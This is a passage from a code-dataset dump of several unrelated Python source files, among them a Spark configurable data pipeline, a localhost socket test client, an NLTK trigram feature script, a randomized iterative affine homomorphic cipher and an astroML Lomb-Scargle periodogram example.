file\"\"\"\n with open(f\"{config_path}\", 'r') as f:\n config = json.load(f)\n return config\n\n\ndef start_staging_job(spark, config, task, timeout=None):\n \"\"\"Creates the staging job\"\"\"\n schema = StructType.fromJson(task[\"schema\"])\n location = task[\"location\"]\n target = task[\"target\"]\n type = task[\"type\"]\n output = task[\"output\"]\n format = task[\"format\"]\n landing_path = config[\"landing_path\"]\n staging_path = config[\"staging_path\"]\n df, is_streaming = cddp_ingestion.start_ingestion_task(task, spark)\n if is_streaming:\n if \"table\" in output:\n query = df.writeStream\\\n .format(storage_format) \\\n .outputMode(\"append\")\\\n .option(\"checkpointLocation\", staging_path+\"/\"+target+\"_chkpt\")\\\n .toTable(target)\n if timeout is not None:\n query.awaitTermination(timeout)\n if \"file\" in output:\n query = df.writeStream \\\n .format(storage_format) \\\n .outputMode(\"append\") \\\n .option(\"checkpointLocation\", staging_path+\"/\"+target+\"_chkpt\") \\\n .start(staging_path+\"/\"+target)\n if timeout is not None:\n query.awaitTermination(timeout)\n if \"view\" in output:\n df.createOrReplaceTempView(target)\n else:\n if \"table\" in output:\n df.write.format(storage_format).mode(\"append\").option(\"overwriteSchema\", \"true\").saveAsTable(target)\n if \"file\" in output:\n df.write.format(storage_format).mode(\"append\").option(\"overwriteSchema\", \"true\").save(staging_path+\"/\"+target)\n if \"view\" in output:\n df.createOrReplaceTempView(target)\n\n\n # if type == \"streaming\":\n # df = spark \\\n # .readStream \\\n # .format(format) \\\n # .option(\"multiline\", \"true\") \\\n # .option(\"header\", \"true\") \\\n # .schema(schema) \\\n # .load(landing_path+\"/\"+location) \n\n # if \"table\" in output:\n # query = df.writeStream\\\n # .format(storage_format) \\\n # .outputMode(\"append\")\\\n # .option(\"checkpointLocation\", staging_path+\"/\"+target+\"_chkpt\")\\\n # .toTable(target)\n # if timeout is not None:\n # query.awaitTermination(timeout)\n # if \"file\" in output:\n # query = df.writeStream \\\n # .format(storage_format) \\\n # .outputMode(\"append\") \\\n # .option(\"checkpointLocation\", staging_path+\"/\"+target+\"_chkpt\") \\\n # .start(staging_path+\"/\"+target)\n # if timeout is not None:\n # query.awaitTermination(timeout)\n # if \"view\" in output:\n # df.createOrReplaceTempView(target)\n # elif type == \"batch\":\n # df = spark \\\n # .read \\\n # .format(format) \\\n # .option(\"multiline\", \"true\") \\\n # .option(\"header\", \"true\") \\\n # .schema(schema) \\\n # .load(landing_path+\"/\"+location) \n\n # if \"table\" in output:\n # df.write.format(storage_format).mode(\"append\").option(\"overwriteSchema\", \"true\").saveAsTable(target)\n # if \"file\" in output:\n # df.write.format(storage_format).mode(\"append\").option(\"overwriteSchema\", \"true\").save(staging_path+\"/\"+target)\n # if \"view\" in output:\n # df.createOrReplaceTempView(target)\n # else :\n # raise Exception(\"Invalid type\")\n \n\ndef start_standard_job(spark, config, task, need_load_views=True, timeout=None):\n \"\"\"Creates the standard job\"\"\"\n standard_path = config[\"standard_path\"]\n sql = task[\"sql\"]\n output = task[\"output\"]\n if(isinstance(sql, list)):\n sql = \" \\n\".join(sql)\n target = task[\"target\"]\n if need_load_views:\n load_staging_views(spark, config)\n df = spark.sql(sql)\n type = \"batch\"\n if \"type\" in task:\n type = task[\"type\"]\n if type == \"streaming\":\n if \"table\" in output:\n query = df.writeStream\\\n 
.format(storage_format) \\\n .outputMode(\"append\")\\\n .option(\"checkpointLocation\", standard_path+\"/\"+target+\"_chkpt\")\\\n .toTable(target)\n if timeout is not None:\n query.awaitTermination(timeout)\n if \"file\" in output:\n query = df.writeStream \\\n .format(storage_format) \\\n .outputMode(\"append\") \\\n .option(\"checkpointLocation\", standard_path+\"/\"+target+\"_chkpt\") \\\n .start(standard_path+\"/\"+target)\n if timeout is not None:\n query.awaitTermination(timeout)\n if \"view\" in output:\n df.createOrReplaceTempView(target)\n elif type == \"batch\":\n if \"table\" in output:\n df.write.format(storage_format).mode(\"append\").option(\"overwriteSchema\", \"true\").saveAsTable(target)\n if \"file\" in output:\n df.write.format(storage_format).mode(\"append\").option(\"overwriteSchema\", \"true\").save(standard_path+\"/\"+target)\n if \"view\" in output:\n df.createOrReplaceTempView(target)\n else :\n raise Exception(\"Invalid type\")\n\n\ndef start_serving_job(spark, config, task, need_load_views=True, timeout=None):\n \"\"\"Creates the serving job\"\"\"\n serving_path = config[\"serving_path\"]\n sql = task[\"sql\"]\n output = task[\"output\"]\n if(isinstance(sql, list)):\n sql = \" \\n\".join(sql)\n target = task[\"target\"]\n type = \"batch\"\n if \"type\" in task:\n type = task[\"type\"]\n if need_load_views:\n load_staging_views(spark, config)\n load_standard_views(spark, config)\n df = spark.sql(sql)\n if type == \"streaming\":\n if \"table\" in output:\n query = df.writeStream\\\n .format(storage_format) \\\n .outputMode(\"complete\")\\\n .option(\"checkpointLocation\", serving_path+\"/\"+target+\"_chkpt\")\\\n .toTable(target)\n if timeout is not None:\n query.awaitTermination(timeout)\n if \"file\" in output:\n query = df.writeStream \\\n .format(storage_format) \\\n .outputMode(\"complete\") \\\n .option(\"checkpointLocation\", serving_path+\"/\"+target+\"_chkpt\") \\\n .start(serving_path+\"/\"+target)\n if timeout is not None:\n query.awaitTermination(timeout)\n if \"view\" in output:\n df.createOrReplaceTempView(target)\n\n elif type == \"batch\":\n if \"table\" in output:\n df.write.format(storage_format).mode(\"overwrite\").option(\"overwriteSchema\", \"true\").saveAsTable(target)\n if \"file\" in output:\n df.write.format(storage_format).mode(\"overwrite\").option(\"overwriteSchema\", \"true\").save(serving_path+\"/\"+target)\n if \"view\" in output:\n df.createOrReplaceTempView(target)\n else :\n raise Exception(\"Invalid type\")\n\ndef load_staging_views(spark, config):\n landing_path = config[\"landing_path\"]\n if 'staging' in config:\n for task in config[\"staging\"]:\n schema = StructType.fromJson(task[\"schema\"])\n location = task[\"location\"]\n target = task[\"target\"]\n type = task[\"type\"]\n output = task[\"output\"]\n format = task[\"format\"]\n if type == \"streaming\" and \"view\" in output:\n df = spark \\\n .readStream \\\n .format(format) \\\n .option(\"multiline\", \"true\") \\\n .option(\"header\", \"true\") \\\n .schema(schema) \\\n .load(landing_path+\"/\"+location) \n df.createOrReplaceTempView(target)\n elif type == \"batch\" and \"view\" in output:\n df = spark \\\n .read \\\n .format(format) \\\n .option(\"multiline\", \"true\") \\\n .option(\"header\", \"true\") \\\n .schema(schema) \\\n .load(landing_path+\"/\"+location) \n df.createOrReplaceTempView(target)\n\n\ndef load_standard_views(spark, config):\n if 'standard' in config:\n for task in config[\"standard\"]:\n sql = task[\"sql\"]\n output = task[\"output\"]\n 
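# \"sql\" may be given as a single string or a list of lines; normalize it to one statement\n 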
if(isinstance(sql, list)):\n sql = \" \\n\".join(sql)\n target = task[\"target\"]\n df = spark.sql(sql)\n if \"view\" in output:\n df.createOrReplaceTempView(target)\n\ndef show_serving_dataset(spark, config, task):\n \"\"\"Shows the serving dataset\"\"\"\n serving_path = f\"{config['working_dir']}/{config['name']}/serving\"\n target = task[\"target\"]\n df = spark.read.format(storage_format).load(serving_path+\"/\"+target)\n df.show()\n\ndef get_dataset_as_json(spark, config, stage, task, limit=20):\n \"\"\"Returns up to limit rows of the task's dataset as JSON\"\"\"\n staging_path = f\"{config['working_dir']}/{config['name']}/staging\"\n standard_path = f\"{config['working_dir']}/{config['name']}/standard\"\n serving_path = f\"{config['working_dir']}/{config['name']}/serving\"\n task_type = task[\"type\"]\n task_output = task[\"output\"]\n app_name = config[\"name\"]\n spark.sql(f\"USE SCHEMA {app_name}\")\n if \"view\" in task_output and task_type != \"streaming\":\n target = task[\"target\"]\n df = spark.sql(\"select * from \"+target+\" limit \"+str(limit))\n return df.toJSON().map(lambda j: json.loads(j)).collect()\n elif \"table\" in task_output:\n target = task[\"target\"]\n df = spark.sql(\"select * from \"+target+\" limit \"+str(limit))\n return df.toJSON().map(lambda j: json.loads(j)).collect()\n elif \"file\" in task_output:\n target = task[\"target\"]\n path = None\n if stage == \"staging\":\n path = staging_path \n elif stage == \"standard\":\n path = standard_path\n elif stage == \"serving\":\n path = serving_path\n else:\n raise Exception(\"Invalid stage\")\n df = spark.read.format(storage_format).load(path+\"/\"+target)\n df.createOrReplaceTempView(\"tmp_\"+target)\n df = spark.sql(\"select * from tmp_\"+target+ \" limit \"+str(limit))\n return df.toJSON().map(lambda j: json.loads(j)).collect()\n else:\n raise Exception(\"Invalid output\")\n\n\ndef entrypoint():\n parser = argparse.ArgumentParser(description='Process Data pipeline')\n parser.add_argument('--config-path', help='path to pipeline config file', required=True)\n parser.add_argument('--landing-path', help='path to data landing zone', required=True)\n parser.add_argument('--working-dir', help='folder to store data of stages, the default value is a random tmp folder', required=False)\n parser.add_argument('--stage', help='run a task in the specified stage', required=False)\n parser.add_argument('--task', help='run a specified task', required=False)\n parser.add_argument('--show-result', type=bool, default=False, help='flag to show task data result', required=False)\n parser.add_argument('--await-termination', type=int, help='how many seconds to wait before a streaming job terminates; if not specified, the job does not terminate.', required=False)\n\n args = parser.parse_args()\n\n config_path = args.config_path\n awaitTermination = args.await_termination\n stage_arg = args.stage\n task_arg = args.task\n working_dir = args.working_dir\n landing_path = args.landing_path\n show_result = args.show_result\n\n\n config = load_config(config_path)\n config['landing_path'] = landing_path\n config['working_dir'] = working_dir\n\n spark = create_spark_session()\n \n print(f\"\"\"app name: {config[\"name\"]},\n config path: {config_path},\n landing path: {config['landing_path']},\n working dir:{config['working_dir']},\n stage: {stage_arg},\n task: {task_arg}, \n show_result: {show_result}, \n streaming job waiting for {str(awaitTermination)} seconds before terminating\n \"\"\")\n\n init(spark, config, working_dir)\n init_database(spark, config)\n if 'staging' in 
config and (stage_arg is None or stage_arg == \"staging\"):\n for task in config[\"staging\"]:\n if task_arg is None or task['name'] == task_arg:\n start_staging_job(spark, config, task, timeout=awaitTermination)\n if 'standard' in config and (stage_arg is None or stage_arg == \"standard\"):\n for task in config[\"standard\"]:\n if task_arg is None or task['name'] == task_arg:\n # pass timeout as a keyword: the fourth positional parameter is need_load_views\n start_standard_job(spark, config, task, timeout=awaitTermination)\n if 'serving' in config and (stage_arg is None or stage_arg == \"serving\"):\n for task in config[\"serving\"]:\n if task_arg is None or task['name'] == task_arg:\n start_serving_job(spark, config, task, timeout=awaitTermination)\n if show_result:\n print(get_dataset_as_json(spark, config, \"serving\", task))\n\n\ndef wait_for_next_stage(): \n parser = argparse.ArgumentParser(description='Wait for the next stage')\n parser.add_argument('--duration', type=int, default=10, help='how many seconds to wait', required=False)\n args = parser.parse_args()\n print(f\"waiting for {args.duration} seconds before the next stage\")\n time.sleep(args.duration)\n\ndef load_sample_data(spark, data_str, format=\"json\"):\n\n # save data_str to temp file\n temp_file = tempfile.NamedTemporaryFile(delete=False)\n temp_file.write(data_str.encode())\n temp_file.close()\n # print(\"temp file path: \"+temp_file.name)\n file_path = temp_file.name\n # file_path = \"./example/data/fruit-price/tmpasfs2n8k\"\n if format == \"json\":\n # read json file to dataframe\n df = spark \\\n .read \\\n .format(\"json\") \\\n .option(\"header\", \"true\") \\\n .option(\"inferSchema\", \"true\") \\\n .load(temp_file.name)\n elif format == \"csv\":\n df = spark \\\n .read \\\n .format(\"csv\") \\\n .option(\"header\", \"true\") \\\n .option(\"inferSchema\", \"true\") \\\n .option(\"multiline\", \"true\") \\\n .load(file_path)\n # create random table name\n table_name = \"tmp_\"+str(uuid.uuid4()).replace(\"-\", \"\")\n df.createOrReplaceTempView(\"tmp_\"+table_name)\n df = spark.sql(\"select * from tmp_\"+table_name+ \" limit \"+str(25))\n data = df.toJSON().map(lambda j: json.loads(j)).collect()\n json_str = json.dumps(data)\n schema = df.schema.json()\n return json_str, schema\n\n\ndef init_staging_sample_dataframe(spark, config):\n staging_path = config[\"staging_path\"]\n for task in config[\"staging\"]:\n if 'sampleData' in task:\n target = task[\"target\"]\n output = task[\"output\"]\n task_landing_path = config['landing_path']+\"/\"+task['name']\n if not os.path.exists(task_landing_path):\n os.makedirs(task_landing_path)\n filename = task['name']+\".json\"\n sampleData = task['sampleData'] \n with open(task_landing_path+\"/\"+filename, \"w\") as text_file:\n json.dump(sampleData, text_file)\n schema = StructType.fromJson(task[\"schema\"])\n df = spark \\\n .read \\\n .format(\"json\") \\\n .option(\"multiline\", \"true\") \\\n .option(\"header\", \"true\") \\\n .schema(schema) \\\n .load(task_landing_path+\"/\"+filename) \n\n if \"table\" in output:\n df.write.format(storage_format).mode(\"append\").option(\"overwriteSchema\", \"true\").saveAsTable(target)\n if \"file\" in output:\n df.write.format(storage_format).mode(\"append\").option(\"overwriteSchema\", \"true\").save(staging_path+\"/\"+target)\n if \"view\" in output:\n 
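# expose the sample rows as a temp view so later SQL stages can query them\n 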
df.createOrReplaceTempView(target)\n\n\n","repo_name":"maye-msft/simple-configurable-data-pipeline","sub_path":"src/cddp/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":18317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"36057342656","text":"import eel\n\n@eel.expose\ndef hello_world():\n return \"Hello from python\"\n\n@eel.expose\ndef print_string(string):\n if len(string) > 20:\n print(string)\n return \"Success!\"\n else:\n return \"Too few characters. Please type more than 20 characters.\"\n\neel.init('web')\neel.start('index.html', size=(600, 400), options={\n 'port': 8080\n})\n","repo_name":"smketterer/vue-eel-starter","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"67"} +{"seq_id":"15105704833","text":"#!/usr/bin/python3\n# Filename: client.py\n\n# import the socket and sys modules\nimport socket\nimport sys\n\n# create a socket object\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \n\n# get the local hostname\n#host = socket.gethostname() \n#print(host)\nhost = \"127.0.0.1\"\n#print(host)\n\n# set the port number\nport = 11451\n\n# connect to the service on the given host and port\ns.connect((host, port))\n\n# send a short message to the server\nmsg='hello world!'+ \"\\r\\n\"\ns.send(msg.encode('ascii'))\n\n\ns.close()\n","repo_name":"hak0/eye_mouse","sub_path":"opencv_proj/socket_client_test.py","file_name":"socket_client_test.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"21383720915","text":"#data types cont\r\nis_active = True\r\ngame_over = False\r\ngame_over = True\r\n\r\n#string \r\nstring_word = \"9\"\r\nprint(type(string_word))\r\nint_word = 7\r\nprint(type(int_word))\r\n#list\r\n\r\n#dict\r\n\r\n#more to come later","repo_name":"Hossamster/Python-Cheatsheet","sub_path":"Files/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"37284348500","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 22 21:14:16 2020\n\n@author: chenfish\n\"\"\"\n\n# contextual function words \n# # of trigrams consisting of at least 2 function words / # of trigrams \n\n\nimport pandas as pd\nimport nltk\nimport math\nfrom builtins import sum\nimport os\nfrom collections import Counter\n\n\ndata_path = '/Users/yuwen/Desktop/Thesis/Project/data/ht_pe/all_no_split/mtht/'\nprint(data_path)\nprint('We are working on contextual function words.')\n\n\nfor d in os.listdir(data_path): \n \n \n if not d.startswith('.'):\n try: \n file = pd.read_pickle(data_path + d)\n print('Now we are working on', d)\n \n except IsADirectoryError:\n print('Skip the file.', d)\n continue\n \n else:\n print('Skip the file.', d)\n continue\n\n\n text = file['UD']\n \n #flatten the whole corpus \n #t = [word for doc in text for sent in doc for word in sent]\n \n \n #trigram_freq = nltk.FreqDist(nltk.trigrams(t))\n \n context_func = []\n \n\n \n for doc in text: \n \n count = 0\n trigram_count = 0 \n \n \n for line in doc:\n \n trigram_dict = nltk.FreqDist(nltk.trigrams(line))\n trigram_count += len(trigram_dict)\n \n for i in trigram_dict.keys():\n a = Counter(i)\n n = sum(a[x] for x in ['aux','cop','mark','det','clf','case'])\n if n >= 2:\n count += 1\n \n \n try: \n context_func.append(round(count/trigram_count,4))\n \n except ZeroDivisionError: \n 
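# this document yielded no trigrams, so record a zero ratio for it\n 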
context_func.append(0)\n\n\n #append this result to the dataframe as CONTEXT FUNC\n file['CONTEXT FUNC'] = context_func\n \n print('saving the file...', d)\n file.to_pickle(data_path + d)\n\n\n","repo_name":"yuwenchen31/translation_detection","sub_path":"feature_calculation/contextual_func_word.py","file_name":"contextual_func_word.py","file_ext":"py","file_size_in_byte":1873,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"38082573792","text":"import csv # imports the csv module\r\nimport sys # imports the sys module\r\nfrom collections import Counter\r\n\r\ndef getIndex(s,a):\r\n for each in a:\r\n if(each==s):\r\n return(a.index(s))\r\n print(\"column not found.\") #report a miss only after scanning every column\r\n return(-1)\r\n\r\ndef getCol(data,index):\r\n filename = 'col_'+str(index+1)+'.txt'\r\n f = open(filename,'w')#new file\r\n #col = []\r\n for i in range(len(data)):\r\n #col.append(data[i][index])\r\n f.write(data[i][index]+'\\n') \r\n f.close()\r\n #getCount(col)\r\n print(\"Saved as: \"+filename)\r\n #return col\r\n\r\n\r\n\r\ndef run():\r\n word = input(\"Enter the exact column name: \")\r\n if(getIndex(word,l1) != -1):\r\n index = getIndex(word,l1); #column index\r\n dataset = lines_list[1:] #dataset without headers\r\n getCol(dataset,index)\r\n\r\ndef preprocess(lines_list):\r\n for i in range(len(lines_list)):\r\n if(len(lines_list[i])!= header_length):\r\n lines_list = lines_list[:i]\r\n break\r\n return lines_list\r\n\r\ndef getCount(array):\r\n ctr = Counter(array)\r\n for key,value in ctr.items():\r\n print(str(key)+\" => \"+str(value)) \r\n\r\n\r\nn=input(\"Enter the file name without '.csv ': \")\r\nf = open(n+'.csv', 'rb') # opens the csv file\r\nlines = (line.decode('utf-8') for line in f)\r\n\r\nallLines = list(csv.reader(lines))\r\nl1 = list(allLines[0]) #line\r\nheader_length = len(l1)\r\n\r\nlines_list = preprocess(allLines)\r\n \r\nfor i in range(header_length):\r\n print(str(i+1)+\" -> \"+l1[i])\r\nwhile(True):\r\n run()\r\n\r\n\r\n","repo_name":"lahirurangitha/Read-csv-files","sub_path":"prog.py","file_name":"prog.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"4313516148","text":"from aiogram import types, Bot\n\nfrom ma_trade_bot.parser.html.images import get_all_images\nfrom ma_trade_bot.urls.core import build_absolute_url\nfrom ma_trade_bot.files.upload import get_file_from_url\nfrom ma_trade_bot.paper_trader.request import PaperTradeRequest\nfrom ma_trade_bot.paper_trader.dataclasses import PostDataHandle\nfrom ma_trade_bot.root_logging.decorators import log\n\n\n@log\nasync def process_pair_info(bot: Bot, message: types.Message, data: dict):\n \"\"\" scenario for processing data pairs and sending messages by a bot \"\"\"\n\n # Create and validate the post data for the paper trader\n post_data_handler = PostDataHandle(**data)\n if not post_data_handler.is_valid():\n errors_as_text = post_data_handler.errors_as_text(sep='\\n')\n return await bot.send_message(\n message.chat.id,\n f'You have entered incorrect data. Errors: {errors_as_text}'\n )\n\n data_as_text = post_data_handler.as_text(sep='\\n')\n await bot.send_message(\n message.chat.id,\n f'Your data has been accepted.'\n f'\\nData:\\n{data_as_text}'\n )\n await bot.send_message(message.chat.id, 'Wait, please. 
Loading data...')\n\n response = await PaperTradeRequest.post(post_data_handler.as_dict())\n response_text = await response.text()\n\n if response.status != 200:\n return await bot.send_message(message.chat.id, 'Failed to load data. Try again later')\n\n all_images = get_all_images(response_text)\n\n # process response errors\n if 'error' in response_text or len(all_images) == 0:\n return await bot.send_message(message.chat.id, 'Failed to load data or data is missing 😢'\n '\\nTry changing the input or try again later.')\n\n # get image from url as file bytes and send diagram to user\n for image in all_images:\n image_src = image.get('src')\n if image_src is None:\n continue\n\n image_absolute_url = build_absolute_url(PaperTradeRequest.HOST, image_src)\n try:\n file_bytes = await get_file_from_url(image_absolute_url)\n await bot.send_message(message.chat.id, '📈 Diagram:')\n await bot.send_photo(message.chat.id, file_bytes)\n except Exception as e:\n await bot.send_message(message.chat.id, 'Some data could not be loaded 😢')\n","repo_name":"Alex-Stulen/MAtradeBot","sub_path":"ma_trade_bot/paper_trader/bot_scripts.py","file_name":"bot_scripts.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"13505066063","text":"import math\nimport random\n\nimport numpy as np\nfrom gmpy2 import invert\n\nfrom src.affine_encoder import AffineEncoder\n\n\nclass RandomizedIterativeAffineCipher(object):\n def __init__(self):\n pass\n\n @staticmethod\n def generate_keypair(key_size=1024, key_round=5, encode_precision=2 ** 100):\n key_size_array = np.linspace(start=int(key_size / 2), stop=key_size, num=key_round)\n key_size_array = np.floor(key_size_array).astype(np.int64)\n n_array = [0 for _ in range(key_round)]\n a_array = [0 for _ in range(key_round)]\n i = 0\n for key_size in key_size_array:\n n = random.SystemRandom().getrandbits(key_size)\n a_ratio = random.SystemRandom().random()\n a = 0\n while True:\n a_size = int(key_size * a_ratio)\n if a_size == 0: # '==' instead of 'is'; identity checks on ints are unreliable\n a_ratio = random.SystemRandom().random() # redraw the ratio, otherwise this loop could never exit\n continue\n a = random.SystemRandom().getrandbits(a_size)\n if math.gcd(n, a) == 1:\n break\n n_array[i] = n\n a_array[i] = a\n i = i + 1\n\n # pick a generator and a scalar\n g = random.SystemRandom().getrandbits(key_size // 10)\n x = random.SystemRandom().getrandbits(160)\n return RandomizedIterativeAffineCipherKey(a_array, n_array, g, x, encode_precision=encode_precision)\n\n\nclass RandomizedIterativeAffineCipherKey(object):\n def __init__(self, a_array, n_array, g, x, encode_precision=2 ** 100):\n if len(a_array) != len(n_array):\n raise ValueError(\"a_array length must be equal to n_array\")\n self.a_array = a_array\n self.n_array = n_array\n self.key_round = len(self.a_array)\n self.a_inv_array = self.mod_inverse()\n self.affine_encoder = AffineEncoder(mult=encode_precision)\n self.g = g\n self.x = x\n self.h = g * x % self.n_array[0]\n\n def encrypt(self, plaintext):\n return self.raw_encrypt(self.affine_encoder.encode(plaintext))\n\n def decrypt(self, ciphertext):\n if isinstance(ciphertext, int) and ciphertext == 0:\n return 0\n return self.affine_encoder.decode(self.raw_decrypt(ciphertext))\n\n def raw_encrypt(self, plaintext):\n plaintext = self.encode(plaintext)\n ciphertext = RandomizedIterativeAffineCiphertext(plaintext[0], plaintext[1], self.n_array[-1])\n for i in range(self.key_round):\n ciphertext = self.raw_encrypt_round(ciphertext, i)\n return ciphertext\n\n def raw_decrypt(self, ciphertext):\n plaintext1 = 
ciphertext.cipher1\n plaintext2 = ciphertext.cipher2\n for i in range(self.key_round):\n plaintext1, plaintext2 = self.raw_decrypt_round(plaintext1, plaintext2, i)\n encoded_result = RandomizedIterativeAffineCiphertext(\n cipher1=plaintext1,\n cipher2=plaintext2,\n n_final=ciphertext.n_final,\n multiple=ciphertext.multiple,\n mult_times=ciphertext.mult_times\n )\n return self.decode(encoded_result)\n\n def encode(self, plaintext):\n y = random.SystemRandom().getrandbits(160)\n return y * self.g % self.n_array[0], (plaintext + y * self.h) % self.n_array[0]\n\n def decode(self, ciphertext):\n intermediate_result = (ciphertext.cipher2 - self.x * ciphertext.cipher1) % self.n_array[0]\n if intermediate_result / self.n_array[0] > 0.9:\n intermediate_result -= self.n_array[0]\n return intermediate_result / ciphertext.multiple ** ciphertext.mult_times\n\n def raw_encrypt_round(self, plaintext, round_index):\n return RandomizedIterativeAffineCiphertext(\n plaintext.cipher1,\n (self.a_array[round_index] * plaintext.cipher2) % self.n_array[round_index],\n plaintext.n_final\n )\n\n def raw_decrypt_round(self, ciphertext1, ciphertext2, round_index):\n cur_n = self.n_array[self.key_round - 1 - round_index]\n cur_a_inv = self.a_inv_array[self.key_round - 1 - round_index]\n plaintext1 = ciphertext1 % cur_n\n plaintext2 = (cur_a_inv * (ciphertext2 % cur_n)) % cur_n\n if plaintext1 / cur_n > 0.9:\n plaintext1 -= cur_n\n if plaintext2 / cur_n > 0.9:\n plaintext2 -= cur_n\n return plaintext1, plaintext2\n\n def mod_inverse(self):\n a_array_inv = [0 for _ in self.a_array]\n for i in range(self.key_round):\n a_array_inv[i] = int(invert(self.a_array[i], self.n_array[i]))\n return a_array_inv\n\n\nclass RandomizedIterativeAffineCiphertext(object):\n def __init__(self, cipher1, cipher2, n_final, multiple=2 ** 23, mult_times=0):\n self.cipher1 = cipher1\n self.cipher2 = cipher2\n self.n_final = n_final\n self.multiple = multiple\n self.mult_times = mult_times\n\n def __add__(self, other):\n if isinstance(other, RandomizedIterativeAffineCiphertext):\n if self.multiple != other.multiple or self.n_final != other.n_final:\n raise TypeError(\"Two addends must have equal multiples and n_finals\")\n # align the fixed-point scales first: scale the operand with fewer\n # mult_times up by multiple ** diff before adding the ciphers\n if self.mult_times > other.mult_times:\n mult_times_diff = self.mult_times - other.mult_times\n return RandomizedIterativeAffineCiphertext(\n cipher1=(self.cipher1 + other.cipher1 * other.multiple ** mult_times_diff) % self.n_final,\n cipher2=(self.cipher2 + other.cipher2 * other.multiple ** mult_times_diff) % self.n_final,\n n_final=self.n_final,\n multiple=self.multiple,\n mult_times=self.mult_times\n )\n elif self.mult_times < other.mult_times:\n mult_times_diff = other.mult_times - self.mult_times\n return RandomizedIterativeAffineCiphertext(\n cipher1=(self.cipher1 * self.multiple ** mult_times_diff + other.cipher1) % self.n_final,\n cipher2=(self.cipher2 * self.multiple ** mult_times_diff + other.cipher2) % self.n_final,\n n_final=self.n_final,\n multiple=self.multiple,\n mult_times=other.mult_times\n )\n else:\n return RandomizedIterativeAffineCiphertext(\n cipher1=(self.cipher1 + other.cipher1) % self.n_final,\n cipher2=(self.cipher2 + other.cipher2) % self.n_final,\n n_final=self.n_final,\n multiple=self.multiple,\n mult_times=other.mult_times\n )\n elif type(other) is int and other == 0:\n return self\n else:\n raise TypeError(\"Addition only supports IterativeAffineCiphertext and initialization with int zero\")\n\n def __radd__(self, other):\n return self.__add__(other)\n\n def __sub__(self, other):\n return self + 
(other * -1)\n\n def __rsub__(self, other):\n return other + (self * -1)\n\n def __mul__(self, other):\n if type(other) is float or type(other) is np.float32 or type(other) is np.float64:\n return RandomizedIterativeAffineCiphertext(\n cipher1=self.cipher1 * int(other * self.multiple) % self.n_final,\n cipher2=self.cipher2 * int(other * self.multiple) % self.n_final,\n n_final=self.n_final,\n multiple=self.multiple,\n mult_times=self.mult_times + 1\n )\n elif type(other) is int or type(other) is np.int32 or type(other) is np.int64:\n return RandomizedIterativeAffineCiphertext(\n cipher1=self.cipher1 * int(other) % self.n_final,\n cipher2=self.cipher2 * int(other) % self.n_final,\n n_final=self.n_final,\n multiple=self.multiple,\n mult_times=self.mult_times\n )\n else:\n raise TypeError(\"Multiplication only supports native and numpy int and float\")\n\n def __rmul__(self, other):\n return self.__mul__(other)\n","repo_name":"duanbing/RandomizedIterativeAffineCipher","sub_path":"src/randomized_iterative_affine_cipher.py","file_name":"randomized_iterative_affine_cipher.py","file_ext":"py","file_size_in_byte":8034,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"3675795157","text":"\"\"\"\nExample of Lomb-Scargle Algorithm\n---------------------------------\n\"\"\"\n# Author: Jake VanderPlas \n# License: BSD\n# The figure produced by this code is published in the textbook\n# \"Statistics, Data Mining, and Machine Learning in Astronomy\" (2013)\n# For more information, see http://astroML.github.com\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom astroML.time_series import\\\n lomb_scargle, lomb_scargle_BIC, lomb_scargle_bootstrap\n\n#------------------------------------------------------------\n# Generate Data\nnp.random.seed(0)\nN = 30\nP = 0.3\n\nt = np.random.randint(100, size=N) + 0.3 + 0.4 * np.random.random(N)\ny = 10 + np.sin(2 * np.pi * t / P)\ndy = 0.5 + 0.5 * np.random.random(N)\ny_obs = np.random.normal(y, dy)\n\n#------------------------------------------------------------\n# Compute periodogram\nperiod = 10 ** np.linspace(-1, 0, 10000)\nomega = 2 * np.pi / period\nPS = lomb_scargle(t, y_obs, dy, omega, generalized=True)\n\n#------------------------------------------------------------\n# Get significance via bootstrap\nD = lomb_scargle_bootstrap(t, y_obs, dy, omega, generalized=True,\n N_bootstraps=1000, random_state=0)\nsig1, sig5 = np.percentile(D, [99, 95])\n\n#------------------------------------------------------------\n# Plot the results\nfig = plt.figure()\nfig.subplots_adjust(left=0.1, right=0.9, hspace=0.25)\n\n# First panel: the data\nax = fig.add_subplot(211)\nax.errorbar(t, y_obs, dy, fmt='.k', lw=1, ecolor='gray')\nax.set_xlabel('time (days)')\nax.set_ylabel('flux')\nax.set_xlim(-5, 105)\n\n# Second panel: the periodogram & significance levels\nax1 = fig.add_subplot(212, xscale='log')\nax1.plot(period, PS, '-', c='black', lw=1, zorder=1)\nax1.plot([period[0], period[-1]], [sig1, sig1], ':', c='black')\nax1.plot([period[0], period[-1]], [sig5, sig5], ':', c='black')\n\nax1.annotate(\" \", (0.3, 0.65), (0.3, 0.85), ha='center',\n arrowprops=dict(arrowstyle='->'))\n\nax1.set_xlim(period[0], period[-1])\nax1.set_ylim(-0.05, 0.85)\n\nax1.set_xlabel(r'period (days)')\nax1.set_ylabel('power')\n\n# Twin axis: label BIC on the right side\nax2 = ax1.twinx()\nax2.set_ylim(tuple(lomb_scargle_BIC(ax1.get_ylim(), y_obs, dy)))\nax2.set_ylabel(r'$\\Delta 
